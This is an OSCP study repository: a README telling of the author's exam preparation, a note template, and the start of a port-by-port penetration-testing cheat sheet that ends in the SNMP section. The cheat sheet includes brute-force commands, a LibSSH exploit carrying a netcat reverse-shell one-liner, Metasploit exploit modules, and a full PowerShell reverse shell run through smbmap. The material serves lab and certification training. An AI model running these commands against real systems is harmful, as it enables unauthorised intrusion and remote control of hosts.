├── .github └── FUNDING.yml ├── final_cherrytree_template.ctd ├── README.md └── oscp_human_guide.md /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | github: six2dez 2 | custom: ["buymeacoffee.com/six2dez","https://www.blockchain.com/btc/address/bc1qtpjy68ls0nhwj9aveqkqthzrryp6cewh5p9sdr","https://www.paypal.com/paypalme/six2dez"] 3 | -------------------------------------------------------------------------------- /final_cherrytree_template.ctd: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | TCP 7 | 8 | 9 | 10 | 11 | 12 | 13 | UDP 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | Service Exploited: 35 | Vulnerability Type: 36 | Exploit POC: 37 | 38 | 39 | Description 40 | : 41 | 42 | 43 | 44 | 45 | Discovery of Vulnerability 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | Exploit Code Used 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | Proof\Local.txt File 65 | 66 | 67 | ☐ Screenshot with ifconfig\ipconfig 68 | ☐ Submit too OSCP Exam Panel 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | Service Exploited: 79 | Vulnerability Type: 80 | Exploit POC: 81 | 82 | 83 | Description 84 | : 85 | 86 | 87 | Discovery of Vulnerability 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | Exploit Code Used 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | Proof\Local.txt File 107 | 108 | 109 | ☐ Screenshot with ifconfig\ipconfig 110 | ☐ Submit too OSCP Exam Panel 111 | 112 | 113 | 114 | 115 | Operating System 116 | 117 | 118 | 119 | 120 | 121 | Architecture 122 | 123 | 124 | 125 | 126 | 127 | Domain 128 | 129 | 130 | 131 | 132 | 133 | Installed Updates 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCP-Human-Guide 2 | 3 | **Edit** 4 | I'm currently moving all the OSCP stuff and other things to my "[pentest-book](https://six2dez.gitbook.io/pentest-book/)". This repository will not have more updates. Sorry for the inconvenience. 5 | 6 | **This page is the jouney with some tips, the real guide is [HERE](https://github.com/six2dez/OSCP-Human-Guide/blob/master/oscp_human_guide.md)** 7 | 8 | 9 | 10 | My own OSCP guide with some presents, my owncrafted [guide](https://github.com/six2dez/OSCP-Human-Guide/blob/master/oscp_human_guide.md) and my Cherrytree [template](https://github.com/six2dez/OSCP-Human-Guide/blob/master/final_cherrytree_template.ctd), enjoy and feel free to contribute :) 11 | 12 | Table of Contents 13 | ================= 14 | 15 | * [OSCP-Human-Guide](#oscp-human-guide) 16 | * [Intro - Before OSCP](#intro---before-oscp) 17 | * [Penetration Testing Book](#penetration-testing-book) 18 | * [HackTheBox (the easiest ones) and VulnHub](#hackthebox-the-easiest-ones-and-vulnhub) 19 | * [Course and Lab](#course-and-lab) 20 | * [Lab machines step-by-step](#lab-machines-step-by-step) 21 | * [Exam preparation (after labs)](#exam-preparation-after-labs) 22 | * [HackTheBox(VIP) and VulnHub (medium ones)](#hacktheboxvip-and-vulnhub-medium-ones) 23 | * [Exam mockups](#exam-mockups) 24 | * [First mockup:](#first-mockup) 25 | * [Second mockup](#second-mockup) 26 | * [Third mockup](#third-mockup) 27 | * [Fourth mockup](#fourth-mockup) 28 | * [Exam first try](#exam-first-try) 29 | * [Preparations](#preparations) 30 | * [Result](#result) 31 | * [1 extra lab month](#1-extra-lab-month) 32 | * [Exam second try](#exam-second-try) 33 | * [Preparations](#preparations-1) 34 | * [Result](#result-1) 35 | 36 | ## Intro - Before OSCP 37 | 38 | ### Penetration Testing Book 39 | 40 | It was an incredible help to me, I have it on the throne of pentesting basis, litte outdated: https://nostarch.com/pentesting, there is some info to get all the exercises with updated resources here: https://github.com/PollyP/Notes-on-Penetration-Testing-A-Hands-On-Guide-to-Hacking/blob/master/README.md 41 | 42 | ### HackTheBox (the easiest ones) and VulnHub 43 | 44 | ## Course and Lab 45 | 46 | Repeat this mantra: **Sleep, rest, calm down you will get it** 47 | 48 | ### Lab machines step-by-step 49 | 50 | This is a must: **Use only the VM provided for this course, not the Kali latest ISO** 51 | I did it with the PWK VM upgrading only MSF, Nmap, Nikto and the basics, but **not** upgrade the entire OS. 52 | 53 | 1. Open CherryTree template to take screenshots and paste outputs. 54 | 2. Run simple nmap and then the slower. 55 | 3. Check first results (webs, ssh, ftp) from the first fast nmap scan. 56 | 4. Review slower nmap scan. 57 | 5. Always go for the easiest port (SMB, FTP, HTTP...). 58 | 6. Depend on each port do the appropiate enumeration techniches. 59 | 7. Time to find exploits and try them. 60 | 1. In case webpage is your target, look the source code, ever, will find software versions, for example. 61 | 8. When you get the exploit and you have tweaked it for your target and purpose you should be inside as low user. 62 | 9. Simple enumeration such as OS version, users, permissions, files in home, compilers, available tools. 63 | - In case of Windows, with `systeminfo` is enough for me https://github.com/GDSSecurity/Windows-Exploit-Suggester 64 | 10. Find out how to upload files. 65 | 11. Upload your privilege escalation script. 66 | 1. In case of Linux I always used LinEnum and linux-exploit-suggester 67 | 2. Check services running and check the strange ones in [gtfobins](https://gtfobins.github.io/) or [lolbas](https://lolbas-project.github.io/#) and [exploit-db](https://www.exploit-db.com/) 68 | 12. Run your exploit and get root, collect proofs, passwords, review root paths and home paths for interesting files for other machines. 69 | 70 | ## Exam preparation (after labs) 71 | 72 | ### HackTheBox(VIP) and VulnHub (medium ones) 73 | 74 | ### Exam mockups 75 | 76 | I did 4 exam mockups in 2 weeks, yes, 24 hours for 5 machines. Main resource to choose machines: [NetSecFocus Trophy Room](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8) 77 | 78 | #### First mockup: 79 | 80 | - Brainpan [VulnHub](https://www.vulnhub.com/entry/brainpan-1,51/) 81 | - Kioptrix2014 [VulnHub](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) 82 | - Lordoftheroot [VulnHub](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) 83 | - Pwnlab_init [VulnHub](https://www.vulnhub.com/entry/pwnlab-init,158/) 84 | - VulnOsv2 [VulnHub](https://www.vulnhub.com/entry/pwnlab-init,158/) 85 | 86 | #### Second mockup 87 | 88 | - Bastard [HTB](https://www.hackthebox.eu/home/machines/profile/7) 89 | - Blue [HTB](https://www.hackthebox.eu/home/machines/profile/51) 90 | - Conceal [HTB](https://www.hackthebox.eu/home/machines/profile/168) 91 | - Devel [HTB](https://www.hackthebox.eu/home/machines/profile/3) 92 | - Metasploitable3_windows [GitHub](https://github.com/rapid7/metasploitable3) 93 | - Silo [HTB](https://www.hackthebox.eu/home/machines/profile/131) 94 | 95 | #### Third mockup 96 | 97 | - LazySysadmin [VulnHub](https://www.vulnhub.com/entry/lazysysadmin-1,205/) 98 | - Metasploitable3_ubuntu [GitHub](https://github.com/rapid7/metasploitable3) 99 | - MrRobot [VulnHub](https://www.vulnhub.com/entry/mr-robot-1,151/) 100 | - Pinky's Palace v1 [VulnHub](https://www.vulnhub.com/entry/pinkys-palace-v1,225/) 101 | - Own crafted Windows XP machine with SLMail, Minishare, DoStackOverflowGood, VulnServer and WarFTPD. 102 | 103 | #### Fourth mockup 104 | 105 | - Active [HTB](https://www.hackthebox.eu/home/machines/profile/148) 106 | - Bounty [HTB](https://www.hackthebox.eu/home/machines/profile/142) 107 | - Brainpan [VulnHub](https://www.vulnhub.com/entry/brainpan-1,51/) 108 | - Cronos [HTB](https://www.hackthebox.eu/home/machines/profile/11) 109 | - DevOops [HTB](https://www.hackthebox.eu/home/machines/profile/140) 110 | 111 | ## Exam first try 112 | 113 | ### Preparations 114 | 115 | - Session recorded with OBStudio, two screens without sound at 10 fps in mkv format, about 25GB. 116 | 117 | ### Result 118 | 119 | Failed, 6 hours in the first BOF, all went bad due my extreme nervous :( 120 | 121 | ## 1 extra lab month 122 | 123 | After this last month this was my result: IT Network unlocked, 32 machines rooted in Public Network, that's all. No exam mockups. 124 | 125 | ## Exam second try 126 | 127 | ### Preparations 128 | 129 | - Session recorded with OBStudio, two screens without sound at 10 fps in mkv format, about 25GB. 130 | 131 | ### Result 132 | 133 | - After 8 hours 4 machines rooted. After 20 hours 5 machines rooted, with 5 slept. 134 | - [This](https://github.com/whoisflynn/OSCP-Exam-Report-Template) is the template used for my exam report. 135 | - Report done in 4 hours. 136 | 137 | ## Stargazers over time 138 | 139 | [![Stargazers over time](https://starchart.cc/six2dez/OSCP-Human-Guide.svg)](https://starchart.cc/six2dez/OSCP-Human-Guide) 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | -------------------------------------------------------------------------------- /oscp_human_guide.md: -------------------------------------------------------------------------------- 1 | Table of Contents 2 | ================= 3 | 4 | * [Table of Contents](#table-of-contents) 5 | * [Recon](#recon) 6 | * [Enumeration AIO](#enumeration-aio) 7 | * [File enumeration](#file-enumeration) 8 | * [Common](#common) 9 | * [Disk files](#disk-files) 10 | * [Images](#images) 11 | * [Audio](#audio) 12 | * [Port 21 - FTP](#port-21---ftp) 13 | * [Port 22 - SSH](#port-22---ssh) 14 | * [Port 25 - Telnet](#port-25---telnet) 15 | * [Port 69 - UDP - TFTP](#port-69---udp---tftp) 16 | * [Kerberos - 88](#kerberos---88) 17 | * [Port 110 - Pop3](#port-110---pop3) 18 | * [Port 111 - Rpcbind](#port-111---rpcbind) 19 | * [Port 135 - MSRPC](#port-135---msrpc) 20 | * [Port 139/445 - SMB](#port-139445---smb) 21 | * [Port 161/162 UDP - SNMP](#port-161162-udp---snmp) 22 | * [LDAP - 389,636](#ldap---389636) 23 | * [HTTPS - 443](#https---443) 24 | * [500 - ISAKMP IKE](#500---isakmp-ike) 25 | * [513 - Rlogin](#513---rlogin) 26 | * [541 - FortiNet SSLVPN](#541---fortinet-sslvpn) 27 | * [Port 554 - RTSP](#port-554---rtsp) 28 | * [Port 1030/1032/1033/1038](#port-1030103210331038) 29 | * [MSSQL - 1433](#mssql---1433) 30 | * [Port 1521 - Oracle](#port-1521---oracle) 31 | * [Port 2049 - NFS](#port-2049---nfs) 32 | * [Port 2100 - Oracle XML DB](#port-2100---oracle-xml-db) 33 | * [3306 - MySQL](#3306---mysql) 34 | * [Port 3339 - Oracle web interface](#port-3339---oracle-web-interface) 35 | * [RDP - 3389](#rdp---3389) 36 | * [WinRM - 5985](#winrm---5985) 37 | * [VNC - 5900](#vnc---5900) 38 | * [Redis - 6379](#redis---6379) 39 | * [MsDeploy - 8172](#msdeploy---8172) 40 | * [Webdav](#webdav) 41 | * [Unknown ports](#unknown-ports) 42 | * [Port 80 - Web server](#port-80---web-server) 43 | * [Url brute force](#url-brute-force) 44 | * [Default/Weak login](#defaultweak-login) 45 | * [LFI/RFI](#lfirfi) 46 | * [SQL-Injection](#sql-injection) 47 | * [XSS](#xss) 48 | * [Sql-login-bypass](#sql-login-bypass) 49 | * [Bypass image upload restrictions](#bypass-image-upload-restrictions) 50 | * [Password brute force - last resort](#password-brute-force---last-resort) 51 | * [Vulnerability analysis](#vulnerability-analysis) 52 | * [BOF](#bof) 53 | * [Find xploits - Searchsploit and google](#find-xploits---searchsploit-and-google) 54 | * [Reverse Shells](#reverse-shells) 55 | * [Privilege escalation](#privilege-escalation) 56 | * [Common](#common-1) 57 | * [Set up Webserver](#set-up-webserver) 58 | * [Set up FTP Server](#set-up-ftp-server) 59 | * [Set up TFTP](#set-up-tftp) 60 | * [Linux](#linux) 61 | * [Useful commands](#useful-commands) 62 | * [Basic info](#basic-info) 63 | * [Kernel exploits](#kernel-exploits) 64 | * [Programs running as root](#programs-running-as-root) 65 | * [Installed software](#installed-software) 66 | * [Weak/reused/plaintext passwords](#weakreusedplaintext-passwords) 67 | * [Inside service](#inside-service) 68 | * [Suid misconfiguration](#suid-misconfiguration) 69 | * [Unmounted filesystems](#unmounted-filesystems) 70 | * [Cronjob](#cronjob) 71 | * [SSH Keys](#ssh-keys) 72 | * [Bad path configuration](#bad-path-configuration) 73 | * [Find plain passwords](#find-plain-passwords) 74 | * [Scripts](#scripts) 75 | * [SUID](#suid) 76 | * [PS Monitor for cron](#ps-monitor-for-cron) 77 | * [Linux Privesc Tools](#linux-privesc-tools) 78 | * [Linux Precompiled Exploits](#linux-precompiled-exploits) 79 | * [Windows](#windows) 80 | * [Basic info](#basic-info-1) 81 | * [Kernel exploits](#kernel-exploits-1) 82 | * [Cleartext passwords](#cleartext-passwords) 83 | * [Reconfigure service parameters](#reconfigure-service-parameters) 84 | * [Dump process for passwords](#dump-process-for-passwords) 85 | * [Inside service](#inside-service-1) 86 | * [Programs running as root/system](#programs-running-as-rootsystem) 87 | * [Installed software](#installed-software-1) 88 | * [Scheduled tasks](#scheduled-tasks) 89 | * [Weak passwords](#weak-passwords) 90 | * [Add user and enable RDP](#add-user-and-enable-rdp) 91 | * [Powershell sudo for Windows](#powershell-sudo-for-windows) 92 | * [Windows download with bitsadmin](#windows-download-with-bitsadmin) 93 | * [Windows download with certutil.exe](#windows-download-with-certutilexe) 94 | * [Windows download with powershell](#windows-download-with-powershell) 95 | * [Windows Download from FTP](#windows-download-from-ftp) 96 | * [Windows create SMB Server transfer files](#windows-create-smb-server-transfer-files) 97 | * [Windows download with VBS](#windows-download-with-vbs) 98 | * [Windowss XP SP1 PrivEsc](#windowss-xp-sp1-privesc) 99 | * [Pass The Hash](#pass-the-hash) 100 | * [Scripts](#scripts-1) 101 | * [Useradd](#useradd) 102 | * [Powershell Run As](#powershell-run-as) 103 | * [Powershell Reverse Shell](#powershell-reverse-shell) 104 | * [Windows privesc/enum tools](#windows-privescenum-tools) 105 | * [Windows precompiled exploits](#windows-precompiled-exploits) 106 | * [Windows Port Forwarding](#windows-port-forwarding) 107 | * [Loot](#loot) 108 | * [Linux](#linux-1) 109 | * [Proof](#proof) 110 | * [Network secret](#network-secret) 111 | * [Passwords and hashes](#passwords-and-hashes) 112 | * [Dualhomed](#dualhomed) 113 | * [Tcpdump](#tcpdump) 114 | * [Interesting files](#interesting-files) 115 | * [Databases](#databases) 116 | * [SSH-Keys](#ssh-keys-1) 117 | * [Browser](#browser) 118 | * [Mail](#mail) 119 | * [GUI](#gui) 120 | * [Windows](#windows-1) 121 | * [Proof](#proof-1) 122 | * [Passwords and hashes](#passwords-and-hashes-1) 123 | * [Dualhomed](#dualhomed-1) 124 | * [Tcpdump](#tcpdump-1) 125 | * [Interesting files](#interesting-files-1) 126 | 127 | # **Recon** 128 | 129 | ``` 130 | # Enumerate subnet 131 | nmap -sn 10.11.1.1/24 132 | 133 | # Fast simple scan 134 | nmap -sS 10.11.1.111 135 | 136 | # Full complete slow scan with output 137 | nmap -v -sT -A -T4 -p- -Pn --script vuln -oA full 10.11.1.111 138 | 139 | # Autorecon 140 | python3 autorecon.py 10.11.1.111 141 | 142 | # OneTwoPunch 143 | https://raw.githubusercontent.com/superkojiman/onetwopunch/master/onetwopunch.sh 144 | onetwopunch.sh ip.txt tcp 145 | 146 | # Scan for UDP 147 | nmap 10.11.1.111 -sU 148 | unicornscan -mU -v -I 10.11.1.111 149 | 150 | # Connect to udp if one is open 151 | nc -u 10.11.1.111 48772 152 | 153 | # Responder 154 | responder -I eth0 -A 155 | 156 | # Amass 157 | amass enum -ip 10.11.1.1/24 158 | 159 | ``` 160 | - sparta 161 | - `python /root/Reconnoitre/Reconnoitre/reconnoitre.py -t 10.11.1.111 -o test --services` 162 | 163 | 164 | ## Enumeration AIO 165 | [Penetration Testing Methodology - 0DAYsecurity.com](http://0daysecurity.com/penetration-testing/enumeration.html) 166 | 167 | ## File enumeration 168 | 169 | ### Common 170 | 171 | ```bash 172 | # Check real file type 173 | file file.xxx 174 | 175 | # Analyze strings 176 | strings file.xxx 177 | strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars 178 | 179 | # Check embedded files 180 | binwalk file.xxx # Check 181 | binwalk -e file.xxx # Extract 182 | 183 | # Check as binary file in hex 184 | ghex file.xxx 185 | 186 | # Check metadata 187 | exiftool file.xxx 188 | 189 | # Stego tool for multiple formats 190 | wget https://embeddedsw.net/zip/OpenPuff_release.zip 191 | unzip OpenPuff_release.zip -d ./OpenPuff 192 | wine OpenPuff/OpenPuff_release/OpenPuff.exe 193 | ``` 194 | 195 | ### Disk files 196 | 197 | ```bash 198 | # guestmount can mount any kind of disk file 199 | sudo apt-get install libguestfs-tools 200 | guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory 201 | ``` 202 | 203 | ### Images 204 | 205 | ```bash 206 | # Stego 207 | wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar 208 | chmod +x stegsolve.jar 209 | java -jar stegsolve.jar 210 | 211 | # Stegpy 212 | stegpy -p file.png 213 | 214 | # Check png corrupted 215 | pngcheck -v image.jpeg 216 | 217 | # Check what kind of image is 218 | identify -verbose image.jpeg 219 | ``` 220 | 221 | ### Audio 222 | 223 | ```bash 224 | # Check spectrogram 225 | wget https://code.soundsoftware.ac.uk/attachments/download/2561/sonic-visualiser_4.0_amd64.deb 226 | dpkg -i sonic-visualiser_4.0_amd64.deb 227 | 228 | # Check for Stego 229 | hideme stego.mp3 -f && cat output.txt #AudioStego 230 | ``` 231 | 232 | 233 | 234 | ## Port 21 - FTP 235 | 236 | ```bash 237 | nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.11.1.111 238 | ``` 239 | 240 | ## Port 22 - SSH 241 | 242 | - If you have usernames test login with username:username 243 | - Vulnerable Versions: 7.2p1 244 | 245 | ``` 246 | Vulnerable Versions: 7.2p1 247 | nc 10.11.1.111 22 248 | 249 | User can ask to execute a command right after authentication before it’s default command or shell is executed 250 | 251 | $ ssh -v user@10.10.1.111 id 252 | ... 253 | Password: 254 | debug1: Authentication succeeded (keyboard-interactive). 255 | Authenticated to 10.10.1.111 ([10.10.1.1114]:22). 256 | debug1: channel 0: new [client-session] 257 | debug1: Requesting no-more-sessions@openssh.com 258 | debug1: Entering interactive session. 259 | debug1: pledge: network 260 | debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0 261 | debug1: Sending command: id 262 | debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 263 | debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0 264 | uid=1000(user) gid=100(users) groups=100(users) 265 | debug1: channel 0: free: client-session, nchannels 1 266 | Transferred: sent 2412, received 2480 bytes, in 0.1 seconds 267 | Bytes per second: sent 43133.4, received 44349.5 268 | debug1: Exit status 0 269 | 270 | Check Auth Methods: 271 | 272 | $ ssh -v 10.10.1.111 273 | OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019 274 | ... 275 | debug1: Authentications that can continue: publickey,password,keyboard-interactive 276 | 277 | Force Auth Method: 278 | 279 | $ ssh -v 10.10.1.111 -o PreferredAuthentications=password 280 | ... 281 | debug1: Next authentication method: password 282 | 283 | BruteForce: 284 | 285 | patator ssh_login host=10.11.1.111 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.' 286 | hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111 287 | medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh 288 | ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111 289 | 290 | LibSSH Before 0.7.6 and 0.8.4 - LibSSH 0.7.6 / 0.8.4 - Unauthorized Access 291 | Id 292 | python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 id 293 | Reverse 294 | python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.1.111 80 >/tmp/f" 295 | 296 | SSH FUZZ 297 | https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt 298 | 299 | cpan Net::SSH2 300 | ./sshfuzz.pl -H 10.10.1.111 -P 22 -u user -p user 301 | 302 | use auxiliary/fuzzers/ssh/ssh_version_2 303 | 304 | SSH-AUDIT 305 | https://github.com/arthepsy/ssh-audit 306 | 307 | • https://www.exploit-db.com/exploits/18557 ~ Sysax 5.53 – SSH ‘Username’ Remote Buffer Overflow 308 | • https://www.exploit-db.com/exploits/45001 ~ OpenSSH < 6.6 SFTP – Command Execution 309 | • https://www.exploit-db.com/exploits/45233 ~ OpenSSH 2.3 < 7.7 – Username Enumeration 310 | • https://www.exploit-db.com/exploits/46516 ~ OpenSSH SCP Client – Write Arbitrary Files 311 | 312 | http://www.vegardno.net/2017/03/fuzzing-openssh-daemon-using-afl.html 313 | 314 | 315 | SSH Enum users < 7.7: 316 | https://github.com/six2dez/ssh_enum_script 317 | https://www.exploit-db.com/exploits/45233 318 | python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a" 319 | 320 | ``` 321 | 322 | ## Port 25 - Telnet 323 | 324 | ``` 325 | nc -nvv 10.11.1.111 25 326 | HELO foo 327 | 328 | telnet 10.11.1.111 25 329 | VRFY root 330 | 331 | nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.111 332 | smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.111 333 | 334 | Send email unauth: 335 | 336 | MAIL FROM:admin@admin.com 337 | RCPT TO:DestinationEmail@DestinationDomain.com 338 | DATA 339 | test 340 | 341 | . 342 | 343 | Receive: 344 | 250 OK 345 | ``` 346 | 347 | ## Port 69 - UDP - TFTP 348 | 349 | This is used for tftp-server. 350 | 351 | - Vulns tftp in server 1.3, 1.4, 1.9, 2.1, and a few more. 352 | - Checks of FTP Port 21. 353 | 354 | ``` 355 | nmap -p69 --script=tftp-enum.nse 10.11.1.111 356 | ``` 357 | 358 | ## Kerberos - 88 359 | 360 | ``` 361 | - MS14-068 362 | - GetUserSPNs 363 | GET USERS: 364 | 365 | nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP 366 | use auxiliary/gather/kerberos_enumusers 367 | 368 | https://www.tarlogic.com/blog/como-funciona-kerberos/ 369 | https://www.tarlogic.com/blog/como-atacar-kerberos/ 370 | 371 | python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt 372 | 373 | https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/ 374 | ``` 375 | 376 | ## Port 110 - Pop3 377 | 378 | ``` 379 | telnet 10.11.1.111 380 | USER pelle@10.11.1.111 381 | PASS admin 382 | 383 | or: 384 | 385 | USER pelle 386 | PASS admin 387 | 388 | # List all emails 389 | list 390 | 391 | # Retrieve email number 5, for example 392 | retr 9 393 | ``` 394 | 395 | ## Port 111 - Rpcbind 396 | 397 | ``` 398 | rpcinfo -p 10.11.1.111 399 | rpcclient -U "" 10.11.1.111 400 | srvinfo 401 | enumdomusers 402 | getdompwinfo 403 | querydominfo 404 | netshareenum 405 | netshareenumall 406 | ``` 407 | 408 | 409 | ## Port 135 - MSRPC 410 | 411 | Some versions are vulnerable. 412 | 413 | ``` 414 | nmap 10.11.1.111 --script=msrpc-enum 415 | msf > use exploit/windows/dcerpc/ms03_026_dcom 416 | ``` 417 | 418 | ## Port 139/445 - SMB 419 | 420 | 421 | ``` 422 | # Enum hostname 423 | enum4linux -n 10.11.1.111 424 | nmblookup -A 10.11.1.111 425 | nmap --script=smb-enum* --script-args=unsafe=1 -T5 10.11.1.111 426 | 427 | # Get Version 428 | smbver.sh 10.11.1.111 429 | Msfconsole;use scanner/smb/smb_version 430 | ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' 431 | smbclient -L \\\\10.11.1.111 432 | 433 | # Get Shares 434 | smbmap -H 10.11.1.111 -R 435 | echo exit | smbclient -L \\\\10.11.1.111 436 | smbclient \\\\10.11.1.111\\ 437 | smbclient -L //10.11.1.111 -N 438 | nmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111 439 | smbclient -L \\\\10.11.1.111\\ 440 | 441 | # Check null sessions 442 | smbmap -H 10.11.1.111 443 | rpcclient -U "" -N 10.11.1.111 444 | smbclient //10.11.1.111/IPC$ -N 445 | 446 | # Exploit null sessions 447 | enum -s 10.11.1.111 448 | enum -U 10.11.1.111 449 | enum -P 10.11.1.111 450 | enum4linux -a 10.11.1.111 451 | /usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111 452 | 453 | # Connect to username shares 454 | smbclient //10.11.1.111/share -U username 455 | 456 | # Connect to share anonymously 457 | smbclient \\\\10.11.1.111\\ 458 | smbclient //10.11.1.111/ 459 | smbclient //10.11.1.111/ 460 | smbclient //10.11.1.111/<""share name""> 461 | rpcclient -U " " 10.11.1.111 462 | rpcclient -U " " -N 10.11.1.111 463 | 464 | # Check vulns 465 | nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.111 466 | 467 | # Check common security concerns 468 | msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_checks.rc 469 | 470 | # Extra validation 471 | msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_validate.rc 472 | 473 | # Multi exploits 474 | msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost 10.11.1.111; run 475 | 476 | # Bruteforce login 477 | medusa -h 10.11.1.111 -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt 478 | nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111 -vvvv 479 | nmap –script smb-brute 10.11.1.111 480 | 481 | # nmap smb enum & vuln 482 | nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111 483 | nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111 484 | 485 | # Mount smb volume linux 486 | mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share 487 | 488 | # rpcclient commands 489 | rpcclient -U "" 10.11.1.111 490 | srvinfo 491 | enumdomusers 492 | getdompwinfo 493 | querydominfo 494 | netshareenum 495 | netshareenumall 496 | 497 | # Run cmd over smb from linux 498 | winexe -U username //10.11.1.111 "cmd.exe" --system 499 | 500 | # smbmap 501 | smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum 502 | smbmap.py -u username -p 'P@$$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H 10.11.1.111 #RCE 503 | smbmap.py -H 10.11.1.111 -u username -p 'P@$$w0rd1234!' -L # Drive Listing 504 | smbmap.py -u username -p 'P@$$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell 505 | 506 | # Check 507 | \Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt " 508 | ``` 509 | 510 | 511 | ## Port 161/162 UDP - SNMP 512 | 513 | ``` 514 | nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 